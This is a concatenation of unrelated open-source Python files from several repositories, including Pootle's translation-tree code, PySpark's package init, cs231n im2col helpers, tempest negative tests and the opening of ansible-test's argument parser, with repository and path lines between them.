""" Creates a widget just for displaying instructions and help for the user in case the model data are empty """
widget = QtGui.QWidget()
layout = QtGui.QVBoxLayout()
label = QtGui.QLabel("Drag and drop a video from your project in here to add it ! ")
layout.addWidget(label)
widget.setLayout(layout)
return widget
def newTrack(self, video):
"""
This function creates a line in the sketch board view corresponding to a video
:param video: the video that the sketch line stands for
:type video: Video class from core module
"""
#Updating the model
self._model.newSketchBoardVideo(video)
#Updating the view
self.update()
def removeTrack(self, track):
"""
This function calls the model and removes the video corresponding to the selected track.
:param track : the track selected in the view
:type track: QListWidgetItem
"""
#Retrieve the widget
widget = self._trackList.itemWidget(track)
video = widget.getVideo()
#Send to the model
self._model.removeSketchBoardVideo(video)
#Updating the view
self.update()
def update(self):
""" Update the view of the list of tracks """
#If the view got no tracks
if len(self._model.getSketchBoardVideos()) == 0:
self._stackedWidget.setCurrentIndex(0)
#If the view already has tracks, just create new ones and update the others
else :
for video in self._model.getSketchBoardVideos():
if video in self._videoTrackTable.values():
#Updating the data from the model
#Retrieve all the keys corresponding for the value
# for key in self._videoTrackTable.keys():
# #Update them only if they are different from the model data
# if self._videoTrackTable[key] == video:
# if key.getVideo() != video:
# key.update(video)
pass
else :
#Create a new track for this video
widget = Track(video)
item = QtGui.QListWidgetItem()
self._trackList.addItem(item)
self._trackList.setItemWidget(item, widget)
#Reference the new variables
self._videoTrackTable[widget] = video
#Check if a video has been removed
for widget, video in self._videoTrackTable.items():
if video not in self._model.getSketchBoardVideos():
#Remove the widget
self._trackList.removeItemWidget(widget)
#Retrieve the QListWidgetItem for this widget and delete it
for item in self._trackList.findItems() :
if self._trackList.itemWidget(item) == widget :
#Retrieve the row of the item
row = self._trackList.row(item)
#Delete the element
listElement = self._trackList.takeItem(row)
del listElement
#Update the reference table
self._videoTrackTable.pop(widget)
self._stackedWidget.setCurrentIndex(1)
# ----------------------- SIGNAL / SLOT ----------------------------------- #
def addVideo(self):
""" Retrieve the currently selected video from the session view to add it directly as a track """
video = self._sessionView.getList().currentItem().data(QtCore.Qt.UserRole)
self.newTrack(video)
def suppressVideo(self):
""" Retrieve the currently selected video from the sktech board view to remove it """
video = self._trackList.selectedItems()[0]
self.removeTrack(video)
# ----------------------- EVENT HANDLERS -------------------------------- #
def dragEnterEvent(self, event):
if event.mimeData().hasFormat("app/video"):
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasFormat("app/video"):
event.accept()
else:
event.ignore()
def dropEvent(self, event):
self.newTrack(event.mimeData().data("app/video"))
event.setDropAction(QtCore.Qt.CopyAction)
event.accept()
|
Finntack/pootle
|
refs/heads/master
|
pootle/apps/pootle_app/project_tree.py
|
1
|
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import errno
import logging
import os
import re
from django.conf import settings
from pootle.core.log import STORE_RESURRECTED, store_log
from pootle.core.utils.timezone import datetime_min
from pootle_app.models.directory import Directory
from pootle_language.models import Language
from pootle_store.models import Store
from pootle_store.util import absolute_real_path, relative_real_path
#: Case insensitive match for language codes
LANGCODE_RE = re.compile('^[a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?$',
re.IGNORECASE)
#: Case insensitive match for language codes as postfix
LANGCODE_POSTFIX_RE = re.compile(
'^.*?[-_.]([a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?)$', re.IGNORECASE)
def direct_language_match_filename(language_code, path_name):
name = os.path.splitext(os.path.basename(path_name))[0]
if name == language_code or name.lower() == language_code.lower():
return True
# Check file doesn't match another language.
if Language.objects.filter(code__iexact=name).count():
return False
detect = LANGCODE_POSTFIX_RE.split(name)
return (len(detect) > 1 and
(detect[1] == language_code or
detect[1].lower() == language_code.lower()))
def match_template_filename(project, filename):
"""Test if :param:`filename` might point at a template file for a given
:param:`project`.
"""
ext = os.path.splitext(os.path.basename(filename))[1][1:]
# FIXME: is the test for matching extension redundant?
if ext in project.filetype_tool.template_extensions:
if ext not in project.filetype_tool.filetype_extensions:
# Template extension is distinct, surely file is a template.
return True
elif not find_lang_postfix(filename):
# File name can't possibly match any language, assume it is a
# template.
return True
return False
def get_matching_language_dirs(project_dir, language):
return [lang_dir for lang_dir in os.listdir(project_dir)
if language.code == lang_dir]
def get_non_existant_language_dir(project_dir, language, file_style,
make_dirs):
if file_style == "gnu":
return project_dir
elif make_dirs:
language_dir = os.path.join(project_dir, language.code)
os.mkdir(language_dir)
return language_dir
else:
raise IndexError("Directory not found for language %s, project %s" %
(language.code, project_dir))
def get_or_make_language_dir(project_dir, language, file_style, make_dirs):
matching_language_dirs = get_matching_language_dirs(project_dir, language)
if len(matching_language_dirs) == 0:
# If no matching directories can be found, check if it is a GNU-style
# project.
return get_non_existant_language_dir(project_dir, language, file_style,
make_dirs)
else:
return os.path.join(project_dir, matching_language_dirs[0])
def get_language_dir(project_dir, language, file_style, make_dirs):
language_dir = os.path.join(project_dir, language.code)
if not os.path.exists(language_dir):
return get_or_make_language_dir(project_dir, language, file_style,
make_dirs)
else:
return language_dir
def get_translation_project_dir(language, project_dir, file_style,
make_dirs=False):
"""Returns the base directory containing translations files for the
project.
:param make_dirs: if ``True``, project and language directories will be
created as necessary.
"""
if file_style == 'gnu':
return project_dir
else:
return get_language_dir(project_dir, language, file_style, make_dirs)
def is_hidden_file(path):
return path[0] == '.'
def split_files_and_dirs(ignored_files, exts, real_dir, file_filter):
files = []
dirs = []
child_paths = [
child_path
for child_path
in os.listdir(real_dir)
if (child_path not in ignored_files
and not is_hidden_file(child_path))]
for child_path in child_paths:
full_child_path = os.path.join(real_dir, child_path)
should_include_file = (
os.path.isfile(full_child_path)
and os.path.splitext(full_child_path)[1][1:] in exts
and file_filter(full_child_path))
if should_include_file:
files.append(child_path)
elif os.path.isdir(full_child_path):
dirs.append(child_path)
return files, dirs
def add_items(fs_items_set, db_items, create_or_resurrect_db_item, parent):
"""Add/make obsolete the database items to correspond to the filesystem.
:param fs_items_set: items (dirs, files) currently in the filesystem
:param db_items: dict (name, item) of items (dirs, stores) currently in the
database
:param create_or_resurrect_db_item: callable that will create a new db item
or resurrect an obsolete db item with a given name and parent.
:param parent: parent db directory for the items
:return: list of all items, list of newly added items
:rtype: tuple
"""
items = []
new_items = []
db_items_set = set(db_items)
items_to_delete = db_items_set - fs_items_set
items_to_create = fs_items_set - db_items_set
for name in items_to_delete:
db_items[name].makeobsolete()
if len(items_to_delete) > 0:
parent.update_all_cache()
for vfolder_treeitem in parent.vfolder_treeitems:
vfolder_treeitem.update_all_cache()
for name in db_items_set - items_to_delete:
items.append(db_items[name])
for name in items_to_create:
item = create_or_resurrect_db_item(name)
items.append(item)
new_items.append(item)
try:
item.save()
except Exception:
logging.exception('Error while adding %s', item)
return items, new_items
def create_or_resurrect_store(f, parent, name, translation_project):
"""Create or resurrect a store db item with given name and parent."""
try:
store = Store.objects.get(parent=parent, name=name)
store.obsolete = False
store.file_mtime = datetime_min
if store.last_sync_revision is None:
store.last_sync_revision = store.get_max_unit_revision()
store_log(user='system', action=STORE_RESURRECTED,
path=store.pootle_path, store=store.id)
except Store.DoesNotExist:
store = Store.objects.create(
file=f, parent=parent,
name=name, translation_project=translation_project)
store.mark_all_dirty()
return store
def create_or_resurrect_dir(name, parent):
"""Create or resurrect a directory db item with given name and parent."""
try:
directory = Directory.objects.get(parent=parent, name=name)
directory.obsolete = False
except Directory.DoesNotExist:
directory = Directory(name=name, parent=parent)
directory.mark_all_dirty()
return directory
# TODO: rename function or even rewrite it
def add_files(translation_project, ignored_files, exts, relative_dir, db_dir,
file_filter=lambda _x: True):
podir_path = to_podir_path(relative_dir)
files, dirs = split_files_and_dirs(
ignored_files, exts, podir_path, file_filter)
file_set = set(files)
dir_set = set(dirs)
existing_stores = dict((store.name, store) for store in
db_dir.child_stores.live().exclude(file='')
.iterator())
existing_dirs = dict((dir.name, dir) for dir in
db_dir.child_dirs.live().iterator())
files, new_files = add_items(
file_set,
existing_stores,
lambda name: create_or_resurrect_store(
f=os.path.join(relative_dir, name),
parent=db_dir,
name=name,
translation_project=translation_project,
),
db_dir,
)
db_subdirs, new_db_subdirs_ = add_items(
dir_set,
existing_dirs,
lambda name: create_or_resurrect_dir(name=name, parent=db_dir),
db_dir,
)
is_empty = len(files) == 0
for db_subdir in db_subdirs:
fs_subdir = os.path.join(relative_dir, db_subdir.name)
_files, _new_files, _is_empty = add_files(
translation_project,
ignored_files,
exts,
fs_subdir,
db_subdir,
file_filter)
files += _files
new_files += _new_files
is_empty &= _is_empty
if is_empty:
db_dir.makeobsolete()
return files, new_files, is_empty
def to_podir_path(path):
path = relative_real_path(path)
return os.path.join(settings.POOTLE_TRANSLATION_DIRECTORY, path)
def find_lang_postfix(filename):
"""Finds the language code at end of a filename."""
name = os.path.splitext(os.path.basename(filename))[0]
if LANGCODE_RE.match(name):
return name
match = LANGCODE_POSTFIX_RE.match(name)
if match:
return match.groups()[0]
for code in Language.objects.values_list('code', flat=True):
if (name.endswith('-'+code) or name.endswith('_'+code) or
name.endswith('.'+code) or
name.lower().endswith('-'+code.lower())):
return code
def translation_project_dir_exists(language, project):
"""Tests if there are translation files corresponding to the given
:param:`language` and :param:`project`.
"""
if project.get_treestyle() == "gnu":
# GNU style projects are tricky
if language.code == 'templates':
# Language is 'templates'; look for template files
for dirpath_, dirnames, filenames in os.walk(
project.get_real_path()):
for filename in filenames:
if (project.file_belongs_to_project(filename,
match_templates=True)
and match_template_filename(project, filename)):
return True
else:
# find files with the language name in the project dir
for dirpath_, dirnames, filenames in os.walk(
project.get_real_path()):
for filename in filenames:
# FIXME: don't reuse already used file
if (project.file_belongs_to_project(filename,
match_templates=False)
and direct_language_match_filename(language.code,
filename)):
return True
else:
# find directory with the language name in the project dir
try:
dirpath_, dirnames, filename = os.walk(
project.get_real_path()).next()
if language.code in dirnames:
return True
except StopIteration:
pass
return False
def init_store_from_template(translation_project, template_store):
"""Initialize a new file for `translation_project` using `template_store`.
"""
if translation_project.file_style == 'gnu':
target_pootle_path_, target_path = get_translated_name_gnu(
translation_project, template_store)
else:
target_pootle_path_, target_path = get_translated_name(
translation_project, template_store)
# Create the missing directories for the new TP.
target_dir = os.path.dirname(target_path)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
output_file = template_store.file.store
output_file.settargetlanguage(translation_project.language.code)
output_file.savefile(target_path)
def get_translated_name_gnu(translation_project, store):
"""Given a template :param:`store` and a :param:`translation_project` return
target filename.
"""
pootle_path_parts = store.pootle_path.split('/')
pootle_path_parts[1] = translation_project.language.code
pootle_path = '/'.join(pootle_path_parts[:-1])
if not pootle_path.endswith('/'):
pootle_path = pootle_path + '/'
suffix = (
"%s%s%s"
% (translation_project.language.code,
os.extsep,
store.filetype.extension))
# try loading file first
try:
target_store = translation_project.stores.live().get(
parent__pootle_path=pootle_path,
name__iexact=suffix,
)
return (target_store.pootle_path,
target_store.file and target_store.file.path)
except Store.DoesNotExist:
target_store = None
# is this GNU-style with prefix?
use_prefix = (store.parent.child_stores.live().exclude(file="").count() > 1
or translation_project.stores.live().exclude(
name__iexact=suffix, file='').count())
if not use_prefix:
# let's make sure
for tp in translation_project.project.translationproject_set.exclude(
language__code='templates').iterator():
temp_suffix = (
"%s%s%s"
% (tp.language.code,
os.extsep,
store.filetype.template_extension))
if tp.stores.live().exclude(
name__iexact=temp_suffix).exclude(file="").count():
use_prefix = True
break
if use_prefix:
if store.translation_project.language.code == 'templates':
tprefix = os.path.splitext(store.name)[0]
# FIXME: we should detect separator
prefix = tprefix + '-'
else:
prefix = os.path.splitext(store.name)[0][:-len(
store.translation_project.language.code)]
tprefix = prefix[:-1]
try:
target_store = translation_project.stores.live().filter(
parent__pootle_path=pootle_path,
name__in=[
tprefix + '-' + suffix,
tprefix + '_' + suffix,
tprefix + '.' + suffix,
tprefix + '-' + suffix.lower(),
tprefix + '_' + suffix.lower(),
tprefix + '.' + suffix.lower(),
],
)[0]
return (target_store.pootle_path,
target_store.file and target_store.file.path)
except (Store.DoesNotExist, IndexError):
pass
else:
prefix = ""
if store.file:
path_parts = store.file.path.split(os.sep)
name = prefix + suffix
path_parts[-1] = name
pootle_path_parts[-1] = name
else:
path_parts = store.parent.get_real_path().split(os.sep)
path_parts.append(store.name)
return '/'.join(pootle_path_parts), os.sep.join(path_parts)
def get_translated_name(translation_project, store):
name = os.path.splitext(store.name)[0]
if store.file:
path_parts = store.file.name.split(os.sep)
else:
path_parts = store.parent.get_real_path().split(os.sep)
path_parts.append(store.name)
pootle_path_parts = store.pootle_path.split('/')
# Replace language code
path_parts[1] = translation_project.language.code
pootle_path_parts[1] = translation_project.language.code
# Replace extension
path_parts[-1] = (
"%s.%s"
% (name,
store.filetype.extension))
pootle_path_parts[-1] = (
"%s.%s"
% (name,
store.filetype.extension))
return ('/'.join(pootle_path_parts),
absolute_real_path(os.sep.join(path_parts)))
def does_not_exist(path):
if os.path.exists(path):
return False
try:
os.stat(path)
# what the hell?
except OSError as e:
if e.errno == errno.ENOENT:
# explicit no such file or directory
return True
|
pedro2555/acars-api
|
refs/heads/master
|
run.py
|
1
|
#!/usr/bin/env python
"""
Aircraft Communications Addressing and Reporting System API for Flight Simulation
Copyright (C) 2017 Pedro Rodrigues <[email protected]>
This file is part of ACARS API.
ACARS API is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 2 of the License.
ACARS API is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ACARS API. If not, see <http://www.gnu.org/licenses/>.
"""
from eve import Eve
import os
from flask_bootstrap import Bootstrap
from eve_docs import eve_docs
app = Eve()
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
debug = False
else:
port = 5000
host = '0.0.0.0'
debug = True
if __name__ == '__main__':
Bootstrap(app)
app.register_blueprint(eve_docs, url_prefix='/docs')
app.run(host=host, port=port, debug=debug)
|
davidchiles/openaddresses
|
refs/heads/master
|
scripts/no/make_out.py
|
45
|
#!/bin/python
import os
import unicodecsv as csv
writer = csv.DictWriter(open('no.csv', 'w'), fieldnames=('X','Y','PUNKT','KOMM','OBJTYPE','GATENR','GATENAVN','HUSNR','BOKST','POSTNR','POSTNAVN','TRANSID'))
writer.writeheader()
for f in os.listdir('./csv'):
print(f)
with open('./csv/{}'.format(f)) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
writer.writerow(row)
|
srbhklkrn/SERVOENGINE
|
refs/heads/master
|
components/script/dom/bindings/codegen/parser/tests/test_any_null.py
|
276
|
def WebIDLTest(parser, harness):
threw = False
try:
parser.parse("""
interface DoubleNull {
attribute any? foo;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown.")
|
ahnqirage/spark
|
refs/heads/master
|
python/pyspark/__init__.py
|
21
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
PySpark is the Python API for Spark.
Public classes:
- :class:`SparkContext`:
Main entry point for Spark functionality.
- :class:`RDD`:
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
- :class:`Broadcast`:
A broadcast variable that gets reused across tasks.
- :class:`Accumulator`:
An "add-only" shared variable that tasks can only add values to.
- :class:`SparkConf`:
For configuring Spark.
- :class:`SparkFiles`:
Access files shipped with jobs.
- :class:`StorageLevel`:
Finer-grained cache persistence levels.
- :class:`TaskContext`:
Information about the current running task, available on the workers and experimental.
- :class:`RDDBarrier`:
Wraps an RDD under a barrier stage for barrier execution.
- :class:`BarrierTaskContext`:
A :class:`TaskContext` that provides extra info and tooling for barrier execution.
- :class:`BarrierTaskInfo`:
Information about a barrier task.
"""
from functools import wraps
import types
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD, RDDBarrier
from pyspark.files import SparkFiles
from pyspark.storagelevel import StorageLevel
from pyspark.accumulators import Accumulator, AccumulatorParam
from pyspark.broadcast import Broadcast
from pyspark.serializers import MarshalSerializer, PickleSerializer
from pyspark.status import *
from pyspark.taskcontext import TaskContext, BarrierTaskContext, BarrierTaskInfo
from pyspark.profiler import Profiler, BasicProfiler
from pyspark.version import __version__
from pyspark._globals import _NoValue
def since(version):
"""
    A decorator that annotates a function by appending the version of Spark
    in which the function was added.
"""
import re
indent_p = re.compile(r'\n( +)')
def deco(f):
indents = indent_p.findall(f.__doc__)
indent = ' ' * (min(len(m) for m in indents) if indents else 0)
f.__doc__ = f.__doc__.rstrip() + "\n\n%s.. versionadded:: %s" % (indent, version)
return f
return deco
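# --- Illustrative sketch, not part of the original module ---
# `since` appends a Sphinx ``.. versionadded::`` directive to the wrapped
# function's docstring; `_since_example` is a hypothetical name used only here.
def _since_example():
    """Does nothing useful."""
_since_example = since("2.0.0")(_since_example)
# _since_example.__doc__ now ends with ".. versionadded:: 2.0.0"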
def copy_func(f, name=None, sinceversion=None, doc=None):
"""
    Returns a function with the same code, globals, defaults, closure, and
    name (or a new name, if provided).
"""
# See
# http://stackoverflow.com/questions/6527633/how-can-i-make-a-deepcopy-of-a-function-in-python
fn = types.FunctionType(f.__code__, f.__globals__, name or f.__name__, f.__defaults__,
f.__closure__)
# in case f was given attrs (note this dict is a shallow copy):
fn.__dict__.update(f.__dict__)
if doc is not None:
fn.__doc__ = doc
if sinceversion is not None:
fn = since(sinceversion)(fn)
return fn
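# --- Illustrative sketch, not part of the original module ---
# `copy_func` clones a function object so the copy can carry a new name and a
# version annotation; `_add_example` and `plus` are hypothetical names used only here.
def _add_example(a, b):
    """Adds two numbers."""
    return a + b
_plus_example = copy_func(_add_example, name='plus', sinceversion='1.6.0')
# _plus_example(1, 2) == 3, _plus_example.__name__ == 'plus', and its docstring
# now ends with ".. versionadded:: 1.6.0"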
def keyword_only(func):
"""
A decorator that forces keyword arguments in the wrapped method
and saves actual input keyword arguments in `_input_kwargs`.
.. note:: Should only be used to wrap a method where first arg is `self`
"""
@wraps(func)
def wrapper(self, *args, **kwargs):
if len(args) > 0:
raise TypeError("Method %s forces keyword arguments." % func.__name__)
self._input_kwargs = kwargs
return func(self, **kwargs)
return wrapper
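# --- Illustrative sketch, not part of the original module ---
# `keyword_only` rejects positional arguments and records the keyword arguments
# on the instance; `_KeywordOnlyExample` is a hypothetical class used only here.
class _KeywordOnlyExample(object):
    @keyword_only
    def set_params(self, alpha=0.1, beta=0.2):
        return self._input_kwargs
# _KeywordOnlyExample().set_params(alpha=0.5) returns {'alpha': 0.5};
# _KeywordOnlyExample().set_params(0.5) raises TypeError.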
# for back compatibility
from pyspark.sql import SQLContext, HiveContext, Row
__all__ = [
"SparkConf", "SparkContext", "SparkFiles", "RDD", "StorageLevel", "Broadcast",
"Accumulator", "AccumulatorParam", "MarshalSerializer", "PickleSerializer",
"StatusTracker", "SparkJobInfo", "SparkStageInfo", "Profiler", "BasicProfiler", "TaskContext",
"RDDBarrier", "BarrierTaskContext", "BarrierTaskInfo",
]
|
gutouyu/cs231n
|
refs/heads/master
|
cs231n/assignment/assignment3/cs231n/im2col.py
|
53
|
import numpy as np
def get_im2col_indices(x_shape, field_height, field_width, padding=1, stride=1):
# First figure out what the size of the output should be
N, C, H, W = x_shape
assert (H + 2 * padding - field_height) % stride == 0
    assert (W + 2 * padding - field_width) % stride == 0
    out_height = (H + 2 * padding - field_height) // stride + 1
    out_width = (W + 2 * padding - field_width) // stride + 1
i0 = np.repeat(np.arange(field_height), field_width)
i0 = np.tile(i0, C)
i1 = stride * np.repeat(np.arange(out_height), out_width)
j0 = np.tile(np.arange(field_width), field_height * C)
j1 = stride * np.tile(np.arange(out_width), out_height)
i = i0.reshape(-1, 1) + i1.reshape(1, -1)
j = j0.reshape(-1, 1) + j1.reshape(1, -1)
k = np.repeat(np.arange(C), field_height * field_width).reshape(-1, 1)
return (k, i, j)
def im2col_indices(x, field_height, field_width, padding=1, stride=1):
""" An implementation of im2col based on some fancy indexing """
# Zero-pad the input
p = padding
x_padded = np.pad(x, ((0, 0), (0, 0), (p, p), (p, p)), mode='constant')
k, i, j = get_im2col_indices(x.shape, field_height, field_width, padding,
stride)
cols = x_padded[:, k, i, j]
C = x.shape[1]
cols = cols.transpose(1, 2, 0).reshape(field_height * field_width * C, -1)
return cols
def col2im_indices(cols, x_shape, field_height=3, field_width=3, padding=1,
stride=1):
""" An implementation of col2im based on fancy indexing and np.add.at """
N, C, H, W = x_shape
H_padded, W_padded = H + 2 * padding, W + 2 * padding
x_padded = np.zeros((N, C, H_padded, W_padded), dtype=cols.dtype)
k, i, j = get_im2col_indices(x_shape, field_height, field_width, padding,
stride)
cols_reshaped = cols.reshape(C * field_height * field_width, -1, N)
cols_reshaped = cols_reshaped.transpose(2, 0, 1)
np.add.at(x_padded, (slice(None), k, i, j), cols_reshaped)
if padding == 0:
return x_padded
return x_padded[:, :, padding:-padding, padding:-padding]
pass
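# --- Illustrative usage sketch, not part of the original file ---
# For a single 1x4x4 input with a 3x3 receptive field, padding=1 and stride=1,
# the output map is 4x4, so im2col yields a (3*3*1, 4*4*1) = (9, 16) matrix and
# col2im maps the columns back to the input shape.
if __name__ == '__main__':
    x = np.arange(16, dtype=np.float64).reshape(1, 1, 4, 4)
    cols = im2col_indices(x, field_height=3, field_width=3, padding=1, stride=1)
    print(cols.shape)    # (9, 16)
    x_back = col2im_indices(cols, x.shape, field_height=3, field_width=3, padding=1)
    print(x_back.shape)  # (1, 1, 4, 4)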
|
hpcloud-mon/tempest
|
refs/heads/master
|
tempest/api/image/v1/test_image_members_negative.py
|
4
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.image import base
from tempest import test
class ImageMembersNegativeTest(base.BaseV1ImageMembersTest):
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('147a9536-18e3-45da-91ea-b037a028f364')
def test_add_member_with_non_existing_image(self):
# Add member with non existing image.
non_exist_image = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.add_member,
self.alt_tenant_id, non_exist_image)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('e1559f05-b667-4f1b-a7af-518b52dc0c0f')
def test_delete_member_with_non_existing_image(self):
# Delete member with non existing image.
non_exist_image = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.delete_member,
self.alt_tenant_id, non_exist_image)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('f5720333-dd69-4194-bb76-d2f048addd56')
def test_delete_member_with_non_existing_tenant(self):
# Delete member with non existing tenant.
image_id = self._create_image()
non_exist_tenant = data_utils.rand_uuid_hex()
self.assertRaises(lib_exc.NotFound, self.client.delete_member,
non_exist_tenant, image_id)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('f25f89e4-0b6c-453b-a853-1f80b9d7ef26')
def test_get_image_without_membership(self):
# Image is hidden from another tenants.
image_id = self._create_image()
self.assertRaises(lib_exc.NotFound,
self.alt_img_cli.get_image,
image_id)
|
tsdmgz/ansible
|
refs/heads/devel
|
test/runner/test.py
|
1
|
#!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
"""Test runner for all Ansible tests."""
from __future__ import absolute_import, print_function
import errno
import os
import sys
from lib.util import (
ApplicationError,
display,
raw_command,
find_pip,
get_docker_completion,
)
from lib.delegation import (
delegate,
)
from lib.executor import (
command_posix_integration,
command_network_integration,
command_windows_integration,
command_units,
command_compile,
command_shell,
SUPPORTED_PYTHON_VERSIONS,
COMPILE_PYTHON_VERSIONS,
ApplicationWarning,
Delegate,
generate_pip_install,
check_startup,
)
from lib.config import (
IntegrationConfig,
PosixIntegrationConfig,
WindowsIntegrationConfig,
NetworkIntegrationConfig,
SanityConfig,
UnitsConfig,
CompileConfig,
ShellConfig,
)
from lib.sanity import (
command_sanity,
sanity_init,
sanity_get_tests,
)
from lib.target import (
find_target_completion,
walk_posix_integration_targets,
walk_network_integration_targets,
walk_windows_integration_targets,
walk_units_targets,
walk_compile_targets,
walk_sanity_targets,
)
from lib.core_ci import (
AWS_ENDPOINTS,
)
from lib.cloud import (
initialize_cloud_plugins,
)
import lib.cover
def main():
"""Main program function."""
try:
git_root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
os.chdir(git_root)
initialize_cloud_plugins()
sanity_init()
args = parse_args()
config = args.config(args)
display.verbosity = config.verbosity
display.color = config.color
display.info_stderr = (isinstance(config, SanityConfig) and config.lint) or (isinstance(config, IntegrationConfig) and config.list_targets)
check_startup()
try:
args.func(config)
except Delegate as ex:
delegate(config, ex.exclude, ex.require)
display.review_warnings()
except ApplicationWarning as ex:
display.warning(str(ex))
exit(0)
except ApplicationError as ex:
display.error(str(ex))
exit(1)
except KeyboardInterrupt:
exit(2)
except IOError as ex:
if ex.errno == errno.EPIPE:
exit(3)
raise
def parse_args():
"""Parse command line arguments."""
try:
import argparse
except ImportError:
if '--requirements' not in sys.argv:
raise
raw_command(generate_pip_install(find_pip(), 'ansible-test'))
import argparse
try:
import argcomplete
except ImportError:
argcomplete = None
if argcomplete:
epilog = 'Tab completion available using the "argcomplete" python package.'
else:
epilog = 'Install the "argcomplete" python package to enable tab completion.'
parser = argparse.ArgumentParser(epilog=epilog)
common = argparse.ArgumentParser(add_help=False)
common.add_argument('-e', '--explain',
action='store_true',
help='explain commands that would be executed')
common.add_argument('-v', '--verbose',
dest='verbosity',
action='count',
default=0,
help='display more output')
common.add_argument('--color',
metavar='COLOR',
nargs='?',
help='generate color output: %(choices)s',
choices=('yes', 'no', 'auto'),
const='yes',
default='auto')
common.add_argument('--debug',
action='store_true',
help='run ansible commands in debug mode')
test = argparse.ArgumentParser(add_help=False, parents=[common])
test.add_argument('include',
metavar='TARGET',
nargs='*',
help='test the specified target').completer = complete_target
test.add_argument('--exclude',
metavar='TARGET',
action='append',
help='exclude the specified target').completer = complete_target
test.add_argument('--require',
metavar='TARGET',
action='append',
help='require the specified target').completer = complete_target
test.add_argument('--coverage',
action='store_true',
help='analyze code coverage when running tests')
test.add_argument('--coverage-label',
default='',
help='label to include in coverage output file names')
test.add_argument('--metadata',
help=argparse.SUPPRESS)
add_changes(test, argparse)
add_environments(test)
integration = argparse.ArgumentParser(add_help=False, parents=[test])
integration.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
integration.add_argument('--start-at',
metavar='TARGET',
help='start at the specified target').completer = complete_target
integration.add_argument('--start-at-task',
metavar='TASK',
help='start at the specified task')
integration.add_argument('--tags',
metavar='TAGS',
help='only run plays and tasks tagged with these values')
integration.add_argument('--skip-tags',
metavar='TAGS',
help='only run plays and tasks whose tags do not match these values')
integration.add_argument('--diff',
action='store_true',
help='show diff output')
integration.add_argument('--allow-destructive',
action='store_true',
help='allow destructive tests (--local and --tox only)')
integration.add_argument('--retry-on-error',
action='store_true',
help='retry failed test with increased verbosity')
integration.add_argument('--continue-on-error',
action='store_true',
help='continue after failed test')
integration.add_argument('--debug-strategy',
action='store_true',
help='run test playbooks using the debug strategy')
integration.add_argument('--changed-all-target',
metavar='TARGET',
default='all',
help='target to run when all tests are needed')
integration.add_argument('--list-targets',
action='store_true',
help='list matching targets instead of running tests')
subparsers = parser.add_subparsers(metavar='COMMAND')
subparsers.required = True # work-around for python 3 bug which makes subparsers optional
posix_integration = subparsers.add_parser('integration',
parents=[integration],
help='posix integration tests')
posix_integration.set_defaults(func=command_posix_integration,
targets=walk_posix_integration_targets,
config=PosixIntegrationConfig)
add_extra_docker_options(posix_integration)
network_integration = subparsers.add_parser('network-integration',
parents=[integration],
help='network integration tests')
network_integration.set_defaults(func=command_network_integration,
targets=walk_network_integration_targets,
config=NetworkIntegrationConfig)
add_extra_docker_options(network_integration, integration=False)
network_integration.add_argument('--platform',
metavar='PLATFORM',
action='append',
help='network platform/version').completer = complete_network_platform
network_integration.add_argument('--inventory',
metavar='PATH',
help='path to inventory used for tests')
windows_integration = subparsers.add_parser('windows-integration',
parents=[integration],
help='windows integration tests')
windows_integration.set_defaults(func=command_windows_integration,
targets=walk_windows_integration_targets,
config=WindowsIntegrationConfig)
add_extra_docker_options(windows_integration, integration=False)
windows_integration.add_argument('--windows',
metavar='VERSION',
action='append',
help='windows version').completer = complete_windows
units = subparsers.add_parser('units',
parents=[test],
help='unit tests')
units.set_defaults(func=command_units,
targets=walk_units_targets,
config=UnitsConfig)
units.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
